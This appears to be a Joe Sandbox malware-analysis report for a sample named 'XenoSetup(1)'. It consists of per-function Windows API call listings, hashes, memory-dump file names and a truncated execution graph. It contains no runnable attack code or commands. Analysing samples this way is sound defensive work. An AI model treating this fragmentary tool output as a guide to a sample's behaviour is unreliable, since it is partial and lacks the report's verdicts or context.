                                                                                      • API String ID: 1035833867-0
                                                                                      • Opcode ID: bf23a90d0171a1db035c3f718e3a1005828a5c1bce5860379adebe3a0429325f
                                                                                      • Instruction ID: ac4f7476a4bf9510a6aab3626bea41ea668c5f58a7227e31bb7c564dea540e5e
                                                                                      • Opcode Fuzzy Hash: bf23a90d0171a1db035c3f718e3a1005828a5c1bce5860379adebe3a0429325f
                                                                                      • Instruction Fuzzy Hash: 4DE08CB9942730A7C3305F60A95DB8A3E64BB15B52F105301FB859A188DBAE84008BA0
                                                                                      APIs
                                                                                        • Part of subcall function 00FFA699: GetDC.USER32(00000000), ref: 00FFA69D
                                                                                        • Part of subcall function 00FFA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FFA6A8
                                                                                        • Part of subcall function 00FFA699: ReleaseDC.USER32(00000000,00000000), ref: 00FFA6B3
                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00FFA83C
                                                                                        • Part of subcall function 00FFAAC9: GetDC.USER32(00000000), ref: 00FFAAD2
                                                                                        • Part of subcall function 00FFAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00FFAB01
                                                                                        • Part of subcall function 00FFAAC9: ReleaseDC.USER32(00000000,?), ref: 00FFAB99
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectRelease$CapsDevice
                                                                                      • String ID: (
                                                                                      • API String ID: 1061551593-3887548279
                                                                                      • Opcode ID: 1f648da1463f78a94845e166111ba136f86c376cacbceb74a64f1add1f79f768
                                                                                      • Instruction ID: ab2d109de64be1d5a14777fa3a00e4c357e61a26f683d5b808fa71a7fbe57381
                                                                                      • Opcode Fuzzy Hash: 1f648da1463f78a94845e166111ba136f86c376cacbceb74a64f1add1f79f768
                                                                                      • Instruction Fuzzy Hash: 709102B5604354AFD720DF25C884A6BBBE8FFC9710F00491EF59AD7220DB79A805CB62
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 0100B324
                                                                                        • Part of subcall function 01009097: IsProcessorFeaturePresent.KERNEL32(00000017,01009086,00000050,01013A34,?,00FED710,00000004,01021030,?,?,01009093,00000000,00000000,00000000,00000000,00000000), ref: 01009099
                                                                                        • Part of subcall function 01009097: GetCurrentProcess.KERNEL32(C0000417,01013A34,00000050,01021030), ref: 010090BB
                                                                                        • Part of subcall function 01009097: TerminateProcess.KERNEL32(00000000), ref: 010090C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                      • String ID: *?$.
                                                                                      • API String ID: 2667617558-3972193922
                                                                                      • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                      • Instruction ID: 5e3b4a46c578d273bd442edc8e9b40f1a9140f2cc9f4ef23d4cb0a458425235a
                                                                                      • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                      • Instruction Fuzzy Hash: CA516475E0010AAFEF16DFA8C8819EDBBF5FF58314F2481A9D994E7381E6359A01CB50
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FE75E3
                                                                                        • Part of subcall function 00FF05DA: _wcslen.LIBCMT ref: 00FF05E0
                                                                                        • Part of subcall function 00FEA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FEA598
                                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FE777F
                                                                                        • Part of subcall function 00FEA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA501
                                                                                        • Part of subcall function 00FEA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA532
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                      • String ID: :
                                                                                      • API String ID: 3226429890-336475711
                                                                                      • Opcode ID: a8ed7d453a8e82c0e41e6a5ea52cd3e37e2b87923ce6f742ae0a3d539423d64c
                                                                                      • Instruction ID: 7e3647f1ce5c407ec783e3abdcb1c488fee60a90a9ed83ca20845b8cf0bc3c0a
                                                                                      • Opcode Fuzzy Hash: a8ed7d453a8e82c0e41e6a5ea52cd3e37e2b87923ce6f742ae0a3d539423d64c
                                                                                      • Instruction Fuzzy Hash: 4B418271805298AAEB35EB66CC59EEEB77CAF41300F0440D6B605A7092DB785F84EF71
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: }
                                                                                      • API String ID: 176396367-4239843852
                                                                                      • Opcode ID: d11209feb10e2f39b04bd258b7dc1923f16d55493e66f32f232d14a02b9cf2ff
                                                                                      • Instruction ID: 0bb05381ed62b88a08f8932544e3a08989011ac3f71f11eb1ce426c6f570e233
                                                                                      • Opcode Fuzzy Hash: d11209feb10e2f39b04bd258b7dc1923f16d55493e66f32f232d14a02b9cf2ff
                                                                                      • Instruction Fuzzy Hash: 0D21D472D0434E5AD732EA64DC44A7BB3DCDF50760F08042AF680C7165EB699D48A3A2
                                                                                      APIs
                                                                                        • Part of subcall function 00FEF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FEF2E4
                                                                                        • Part of subcall function 00FEF2C5: GetProcAddress.KERNEL32(010281C8,CryptUnprotectMemory), ref: 00FEF2F4
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,00FEF33E), ref: 00FEF3D2
                                                                                      Strings
                                                                                      • CryptProtectMemory failed, xrefs: 00FEF389
                                                                                      • CryptUnprotectMemory failed, xrefs: 00FEF3CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CurrentProcess
                                                                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                      • API String ID: 2190909847-396321323
                                                                                      • Opcode ID: 7d45269a2b2877c111e7b6c7ae9f0c44cd7401528e1d9d3bdf2d2a46aa93e736
                                                                                      • Instruction ID: f11b17530da078c1041766be47612517bc4f6ff787894a7c6739262bb94e8d67
                                                                                      • Opcode Fuzzy Hash: 7d45269a2b2877c111e7b6c7ae9f0c44cd7401528e1d9d3bdf2d2a46aa93e736
                                                                                      • Instruction Fuzzy Hash: 48115932A002A8AFDF21AF32DC41A6E3B58FF00770B208166FC855F285CA799C04A781
                                                                                      APIs
                                                                                      • _swprintf.LIBCMT ref: 00FEB9B8
                                                                                        • Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: __vswprintf_c_l_swprintf
                                                                                      • String ID: %c:\
                                                                                      • API String ID: 1543624204-3142399695
                                                                                      • Opcode ID: 2f15faf472ac0c21fcdd700721f25b3037367252cc7b4dfee599ca4365cc9d51
                                                                                      • Instruction ID: e2873d232dd7fe8c2bd9bcf2cf41b3dd15e0e85a862b060808aead17e7b6fc62
                                                                                      • Opcode Fuzzy Hash: 2f15faf472ac0c21fcdd700721f25b3037367252cc7b4dfee599ca4365cc9d51
                                                                                      • Instruction Fuzzy Hash: 2501F56390435279EA32AB778C45D6BB7ACEF91770F50452FF984D6082EB28D85092B1
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,00010000,00FF1160,?,00000000,00000000), ref: 00FF1043
                                                                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00FF108A
                                                                                        • Part of subcall function 00FE6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE6C54
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                      • String ID: CreateThread failed
                                                                                      • API String ID: 2655393344-3849766595
                                                                                      • Opcode ID: f98229aa847065fa9f1fc1100770c604202d36fa735443cd8fdca7e97ee00a90
                                                                                      • Instruction ID: d1a39ad8b1dce3ef55b2a1d9bb3ab7e3ea3d79a112d7d0bd6c8aac30cdbcfa82
                                                                                      • Opcode Fuzzy Hash: f98229aa847065fa9f1fc1100770c604202d36fa735443cd8fdca7e97ee00a90
                                                                                      • Instruction Fuzzy Hash: 0F01D6B534434DABD3345E65EC91F76B398FF50761F20002EFAC696285CEEAA8449724
                                                                                      APIs
                                                                                        • Part of subcall function 00FEE2E8: _swprintf.LIBCMT ref: 00FEE30E
                                                                                        • Part of subcall function 00FEE2E8: _strlen.LIBCMT ref: 00FEE32F
                                                                                        • Part of subcall function 00FEE2E8: SetDlgItemTextW.USER32(?,0101E274,?), ref: 00FEE38F
                                                                                        • Part of subcall function 00FEE2E8: GetWindowRect.USER32(?,?), ref: 00FEE3C9
                                                                                        • Part of subcall function 00FEE2E8: GetClientRect.USER32(?,?), ref: 00FEE3D5
                                                                                      • GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
                                                                                      • SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                      • String ID: 0
                                                                                      • API String ID: 2622349952-4108050209
                                                                                      • Opcode ID: 713e95c96ee9b5688137299791da814fc067d391382a915753d9cb2d1b4446af
                                                                                      • Instruction ID: 081be2bc5c6c9ec6d29863027768b90034d84d6345dd670a5cc0a07f0fb7ee6a
                                                                                      • Opcode Fuzzy Hash: 713e95c96ee9b5688137299791da814fc067d391382a915753d9cb2d1b4446af
                                                                                      • Instruction Fuzzy Hash: 9EF08CB09042D8ABDF150F63C80DBAA3B68BB40364F048208FD84589E1CB7AC890BB10
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00FF1206,?), ref: 00FF0FEA
                                                                                      • GetLastError.KERNEL32(?), ref: 00FF0FF6
                                                                                        • Part of subcall function 00FE6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE6C54
                                                                                      Strings
                                                                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00FF0FFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                      • API String ID: 1091760877-2248577382
                                                                                      • Opcode ID: 3acdcf3ddeefa09c46b4512157dc283edcc1f8d2d3484833f16d6e94a34ce15c
                                                                                      • Instruction ID: 8202bd2181984d9efb09584688ffe2d92555cf89e394a37d048e779a8e1dda4e
                                                                                      • Opcode Fuzzy Hash: 3acdcf3ddeefa09c46b4512157dc283edcc1f8d2d3484833f16d6e94a34ce15c
                                                                                      • Instruction Fuzzy Hash: 64D02B3154413476C62132299C09D7E3C04AF21772B300714F1B8A81EACF2D08416391
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00FEDA55,?), ref: 00FEE2A3
                                                                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00FEDA55,?), ref: 00FEE2B1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FindHandleModuleResource
                                                                                      • String ID: RTL
                                                                                      • API String ID: 3537982541-834975271
                                                                                      • Opcode ID: 311b5697f1645b25f4ddb967b3d8fb850904866d0ef19bce736c561b9745c5fb
                                                                                      • Instruction ID: 68d5fb179a17af06b46e0d669d7574bd77aac68e5ecba345c8fb31b63e33dabe
                                                                                      • Opcode Fuzzy Hash: 311b5697f1645b25f4ddb967b3d8fb850904866d0ef19bce736c561b9745c5fb
                                                                                      • Instruction Fuzzy Hash: AEC01231E4075066E6311A657C1DB436E986B00B31F05048CB281FD1C5D6AEC44087A0

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.8%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:1.6%
                                                                                      Total number of Nodes:1410
                                                                                      Total number of Limit Nodes:8
                                                                                      execution_graph 6562 7ff68d5f10bc 6585 7ff68d5f0d80 6562->6585 6565 7ff68d5f1213 6567 7ff68d5f181c 7 API calls 6565->6567 6566 7ff68d5f10dd __scrt_acquire_startup_lock 6568 7ff68d5f121d 6566->6568 6573 7ff68d5f10fb __scrt_release_startup_lock 6566->6573 6567->6568 6569 7ff68d5f181c 7 API calls 6568->6569 6570 7ff68d5f1228 6569->6570 6572 7ff68d5f1230 _exit 6570->6572 6571 7ff68d5f1120 6573->6571 6574 7ff68d5f11a6 _get_initial_wide_environment __p___wargv __p___argc 6573->6574 6577 7ff68d5f119e _register_thread_local_exe_atexit_callback 6573->6577 6591 7ff68d5efb40 6574->6591 6577->6574 6580 7ff68d5f11d3 6581 7ff68d5f11dd 6580->6581 6582 7ff68d5f11d8 _cexit 6580->6582 6617 7ff68d5f0f04 6581->6617 6582->6581 6586 7ff68d5f0d88 6585->6586 6587 7ff68d5f0d94 __scrt_dllmain_crt_thread_attach 6586->6587 6588 7ff68d5f0d9d 6587->6588 6589 7ff68d5f0da1 6587->6589 6588->6565 6588->6566 6589->6588 6621 7ff68d5f26e8 6589->6621 6649 7ff68d5e6fe0 GetEnvironmentVariableW 6591->6649 6594 7ff68d5efc54 6674 7ff68d5e7670 6594->6674 6597 7ff68d5efba4 6830 7ff68d5e7720 6597->6830 6602 7ff68d5efcd7 __acrt_iob_func fflush __acrt_iob_func fflush 6778 7ff68d5e44e0 6602->6778 6603 7ff68d5efc08 6606 7ff68d5efc48 6603->6606 6612 7ff68d5e7720 3 API calls 6603->6612 6604 7ff68d5efcc2 fflush 6604->6602 6605 7ff68d5efc86 6605->6602 6605->6604 6609 7ff68d5efcae SwitchToThread 6605->6609 6611 7ff68d5e7720 3 API calls 6606->6611 6608 7ff68d5efc01 _invalid_parameter_noinfo_noreturn 6608->6603 6609->6605 6610 7ff68d5efd06 6836 7ff68d5f0ce0 6610->6836 6611->6594 6612->6603 6615 7ff68d5f196c GetModuleHandleW 6616 7ff68d5f11cf 6615->6616 6616->6570 6616->6580 6619 7ff68d5f0f15 6617->6619 6618 7ff68d5f0f25 6618->6571 6619->6618 6620 7ff68d5f26e8 8 API calls 6619->6620 6620->6618 6622 7ff68d5f26f0 6621->6622 6623 7ff68d5f26fa 6621->6623 6627 7ff68d5f2ae4 6622->6627 6623->6588 6628 7ff68d5f2af3 6627->6628 6629 7ff68d5f26f5 6627->6629 6635 7ff68d5f4cd4 6628->6635 6631 7ff68d5f4a68 6629->6631 6632 7ff68d5f4a93 6631->6632 6633 7ff68d5f4a76 DeleteCriticalSection 6632->6633 6634 7ff68d5f4a97 6632->6634 6633->6632 6634->6623 6639 7ff68d5f4b3c 6635->6639 6640 7ff68d5f4b80 6639->6640 6641 7ff68d5f4c26 TlsFree 6639->6641 6640->6641 6642 7ff68d5f4bae LoadLibraryExW 6640->6642 6643 7ff68d5f4c6d GetProcAddress 6640->6643 6644 7ff68d5f4bcf GetLastError 6642->6644 6645 7ff68d5f4c4d 6642->6645 6643->6641 6644->6640 6647 7ff68d5f4bda wcsncmp 6644->6647 6645->6643 6646 7ff68d5f4c64 FreeLibrary 6645->6646 6646->6643 6647->6640 6648 7ff68d5f4bf1 LoadLibraryExW 6647->6648 6648->6640 6648->6645 6650 7ff68d5e7045 GetLastError 6649->6650 6651 7ff68d5e707d 6649->6651 6652 7ff68d5e7056 6650->6652 6672 7ff68d5e7078 6650->6672 6654 7ff68d5e7098 GetEnvironmentVariableW 6651->6654 6845 7ff68d5e7a60 6652->6845 6653 7ff68d5e725e 6656 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 6653->6656 6654->6650 6659 7ff68d5e70b2 6654->6659 6658 7ff68d5e726f 6656->6658 6657 7ff68d5e7257 _invalid_parameter_noinfo_noreturn 6657->6653 6658->6594 6815 7ff68d5e6070 6658->6815 6661 7ff68d5e70ca _Yarn 6659->6661 6851 7ff68d5e6600 6659->6851 6662 7ff68d5e710c _wtoi 6661->6662 6663 7ff68d5e712b 6662->6663 6662->6672 6865 7ff68d5e7290 6663->6865 6666 7ff68d5e7138 _time64 _gmtime64_s wcsftime 6667 7ff68d5e71a0 6666->6667 6667->6667 6668 7ff68d5e6070 5 API calls 6667->6668 6669 7ff68d5e71bb 6668->6669 6670 7ff68d5e7720 3 API calls 6669->6670 6671 7ff68d5e71d8 6670->6671 6671->6672 6673 7ff68d5e7211 _invalid_parameter_noinfo_noreturn 6671->6673 6672->6653 6672->6657 6673->6672 6675 7ff68d5e7718 6674->6675 6676 7ff68d5e7694 6674->6676 6678 7ff68d5ef010 6675->6678 6677 7ff68d5e76dc __stdio_common_vfwprintf fputwc 6676->6677 6677->6675 6972 7ff68d5eb670 6678->6972 6681 7ff68d5efaab 6682 7ff68d5e77d0 16 API calls 6681->6682 6688 7ff68d5efa90 6682->6688 6684 7ff68d5ef086 6684->6681 6685 7ff68d5ef08e 6684->6685 7056 7ff68d5eecd0 6685->7056 6686 7ff68d5efb0b 6689 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 6686->6689 6688->6686 6690 7ff68d5efb04 _invalid_parameter_noinfo_noreturn 6688->6690 6691 7ff68d5efb1e 6689->6691 6690->6686 6691->6605 6692 7ff68d5ef9e5 6693 7ff68d5efa39 6692->6693 6695 7ff68d5efa32 _invalid_parameter_noinfo_noreturn 6692->6695 6693->6688 6697 7ff68d5efa89 _invalid_parameter_noinfo_noreturn 6693->6697 6694 7ff68d5ef9de _invalid_parameter_noinfo_noreturn 6694->6692 6695->6693 6697->6688 6698 7ff68d5ef27b 7098 7ff68d5e7dd0 6698->7098 6699 7ff68d5ef0de 6699->6698 6701 7ff68d5ef230 _invalid_parameter_noinfo_noreturn 6699->6701 6731 7ff68d5ef0e2 6699->6731 7081 7ff68d5e7f30 6699->7081 6701->6699 6703 7ff68d5ecd20 47 API calls 6708 7ff68d5ef2b4 6703->6708 6704 7ff68d5e7720 3 API calls 6704->6708 6705 7ff68d5ef38d 6707 7ff68d5e77d0 16 API calls 6705->6707 6706 7ff68d5e7f30 16 API calls 6706->6708 6707->6731 6708->6703 6708->6705 6708->6706 6709 7ff68d5ef3b4 6708->6709 6711 7ff68d5ef372 _invalid_parameter_noinfo_noreturn 6708->6711 7110 7ff68d5ee650 6709->7110 6711->6708 6715 7ff68d5ef489 6717 7ff68d5ef49d GetProcAddress 6715->6717 6718 7ff68d5ef66a GetProcAddress 6715->6718 6716 7ff68d5ef418 6716->6715 6730 7ff68d5ef8b2 6716->6730 6721 7ff68d5ef4b2 6717->6721 6733 7ff68d5ef4f7 6717->6733 6720 7ff68d5ef683 6718->6720 6736 7ff68d5ef73a 6718->6736 6719 7ff68d5e77d0 16 API calls 6722 7ff68d5ef45a 6719->6722 6724 7ff68d5e7720 3 API calls 6720->6724 6725 7ff68d5e7720 3 API calls 6721->6725 6723 7ff68d5e77d0 16 API calls 6722->6723 6727 7ff68d5ef466 6723->6727 6729 7ff68d5ef696 6724->6729 6728 7ff68d5ef4c5 6725->6728 6726 7ff68d5ef98a _invalid_parameter_noinfo_noreturn 6726->6731 6732 7ff68d5e77d0 16 API calls 6727->6732 6737 7ff68d5e77d0 16 API calls 6728->6737 6734 7ff68d5ef6c0 6729->6734 6735 7ff68d5ef6a0 6729->6735 6730->6726 6730->6731 6731->6692 6731->6694 6732->6716 6741 7ff68d5e7720 3 API calls 6733->6741 6740 7ff68d5e7720 3 API calls 6734->6740 6739 7ff68d5e77d0 16 API calls 6735->6739 6743 7ff68d5e7720 3 API calls 6736->6743 6738 7ff68d5ef4df 6737->6738 7204 7ff68d5eef20 6738->7204 6777 7ff68d5ef4ed 6739->6777 6742 7ff68d5ef6d6 6740->6742 6746 7ff68d5ef55e 6741->6746 6747 7ff68d5e7b10 6 API calls 6742->6747 6745 7ff68d5ef79c 6743->6745 6750 7ff68d5e7720 3 API calls 6745->6750 6748 7ff68d5e7720 3 API calls 6746->6748 6749 